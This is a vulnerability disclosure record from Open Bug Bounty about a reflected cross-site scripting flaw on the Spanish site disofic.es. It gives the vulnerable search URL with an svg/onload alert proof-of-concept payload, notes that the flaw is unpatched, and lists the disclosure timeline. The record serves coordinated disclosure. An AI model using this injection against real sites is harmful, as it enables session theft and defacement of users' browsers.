disofic.es XSS vulnerability

2016-11-21T11:08:00
ID OBB:194278
Type openbugbounty
Reporter sinkmanu
Modified 2017-01-16T11:15:00

Description

Vulnerable URL:
http://www.disofic.es/busqueda/?filtro_grupo=&filtro;_marca=&filtro;_ordenacion=&consulta;="/><svg/onload="alert(/OPENBUGBOUNTY/)
</pre>

##### Details:

Description| Value  
---|---  
Patched:| No  
Latest check for patch:| 28.07.2017  
Vulnerability type:| XSS  
Vulnerability status:| Publicly disclosed  
Alexa Rank| 747216  
VIP website status:| No  
Check disofic.es SSL connection:| (Grade: F)

##### Coordinated Disclosure Timeline:

Description| Value  
---|---  
Vulnerability submitted via Open Bug Bounty| 21 November, 2016 11:08 GMT  
Generic security notifications sent to website owner| 21 November, 2016 11:09 GMT  
Notification sent to subscribers (without technical details)| 21 November, 2016 14:17 GMT  
Vulnerability details disclosed by researcher| 16 January, 2017 11:15 GMT